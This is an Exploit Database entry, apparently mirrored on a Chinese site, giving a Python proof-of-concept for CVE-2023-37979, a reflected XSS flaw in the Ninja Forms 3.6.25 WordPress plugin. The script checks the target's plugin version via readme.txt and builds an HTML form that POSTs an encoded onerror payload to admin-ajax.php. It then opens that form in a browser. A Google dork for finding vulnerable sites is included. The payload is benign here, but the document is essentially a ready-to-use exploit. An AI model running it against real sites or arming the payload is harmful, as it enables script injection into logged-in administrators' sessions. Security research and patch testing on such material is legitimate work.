WordPress Plugin Ninja Forms 3.6.25 – Reflected XSS

• Exploit Database
• 133 阅读

• 作者： Mehran Seifalinia
  日期： 2023-08-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51644/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159

  # Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated) # Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt # Date: 2023-07-27 # Exploit Author: Mehran Seifalinia # Vendor Homepage: https://ninjaforms.com/ # Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip # Version: 3.6.25 # Tested on: Windows 10 # CVE: CVE-2023-37979   from requests import get from sys import argv from os import getcwd import webbrowser from time import sleep     # Values: url = argv[-1] if url[-1] == "/": url = url.rstrip("/")   # Constants CVE_NAME = "CVE-2023-37979" VULNERABLE_VERSION = "3.6.25"   # HTML template HTML_TEMPLATE = f"""<!DOCTYPE html> <!-- Created By Mehran Seifalinia --> <html> <head> <title>{CVE_NAME}</title> <style> body {{ font-family: Arial, sans-serif; background-color: #f7f7f7; color: #333; margin: 0; padding: 0; }} header {{ background-color: #4CAF50; padding: 10px; text-align: center; color: white; font-size: 24px; }} .cool-button {{ background-color: #007bff; color: white; padding: 10px 20px; border: none; cursor: pointer; font-size: 16px; border-radius: 4px; }} .cool-button:hover {{ background-color: #0056b3; }} </style> </head> <body> <header> Ninja-forms reflected XSS ({CVE_NAME})</br> Created by Mehran Seifalinia </header> <div style="padding: 20px;"> <form action="{url}/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="nf&#95;batch&#95;process" /> <input type="hidden" name="batch&#95;type" value="import&#95;form&#95;template" /> <input type="hidden" name="security" value="e29f2d8dca" /> <input type="hidden" name="extraData&#91;template&#93;" value="formtemplate&#45;contactformd" /> <input type="hidden" name="method&#95;override" value="&#95;respond" /> <input type="hidden" name="data" value="Mehran"&#125;&#125;<img&#32;src&#61;Seifalinia&#32;onerror&#61;alert&#40;String&#46;fromCharCode&#40;78&#44;105&#44;110&#44;106&#44;97&#44;45&#44;102&#44;111&#44;114&#44;109&#44;115&#44;32&#44;114&#44;101&#44;102&#44;108&#44;101&#44;99&#44;116&#44;101&#44;100&#44;32&#44;88&#44;83&#44;83&#44;10&#44;67&#44;86&#44;69&#44;45&#44;50&#44;48&#44;50&#44;51&#44;45&#44;51&#44;55&#44;57&#44;55&#44;57&#44;10&#44;45&#44;77&#44;101&#44;104&#44;114&#44;97&#44;110&#44;32&#44;83&#44;101&#44;105&#44;102&#44;97&#44;108&#44;105&#44;110&#44;105&#44;97&#44;45&#41;&#41;>" /> <input type="submit" class="cool-button" value="Click here to Execute XSS" /> </form> </div> <div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div> <footer> <a href="https://github.com/Mehran-Seifalinia">Github</a> </br> <a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a </footer> </body> </html> """   def exploit(): with open(f"{CVE_NAME}.html", "w") as poc: poc.write(HTML_TEMPLATE) print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html") print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^") sleep(2) webbrowser.open(f"{getcwd()}\{CVE_NAME}.html")   # Check if the vulnerable version is installed def check_CVE(): try: response = get(url + "/wp-content/plugins/ninja-forms/readme.txt") if response.status_code != 200 or not("Ninja Forms" in response.text): print("[!] Ninja-forms plugin has not installed on this site.") return False else: version = response.text.split("Stable tag:")[1].split("License")[0].split()[0] main_version = int(version.split(".")[0]) partial_version = int(version.split(".")[1]) final_version = int(version.split(".")[2]) if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25): print(f"[*] Vulnerable Nonja-forms version {version} detected!") return True else: print(f"[!] Nonja-forms version {version} is not vulnerable!") return False except Exception as error: print(f"[!] Error: {error}") exit()   # Check syntax of the script def check_script(): usage = f""" Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET]   OPTIONS: --exploit:Open a browser and execute the vulnerability. TARGET: An URL starts with &apos;http://&apos; or &apos;https://&apos;   Examples: > {argv[0].split("/")[-1]} https://vulnsite.com > {argv[0].split("/")[-1]} --exploit https://vulnsite.com """ try: if len(argv) < 2 or len(argv) > 3: print("[!] Syntax error...") print(usage) exit() elif not url.startswith(tuple(["http://", "https://"])): print("[!] Invalid target...\n\tTarget most starts with &apos;http://&apos; or &apos;https://&apos;") exit() else: for arg in argv: if arg == argv[0]: print("[*]Starting the script >>>") state = check_CVE() if state == False: exit() elif arg.lower() == "--exploit": exploit() elif arg == url: continue else: print(f"[!] What the heck is &apos;{arg}&apos; in the command?") except Exception as error: print(f"[!] Error: {error}") exit()   if __name__ == "__main__": check_script()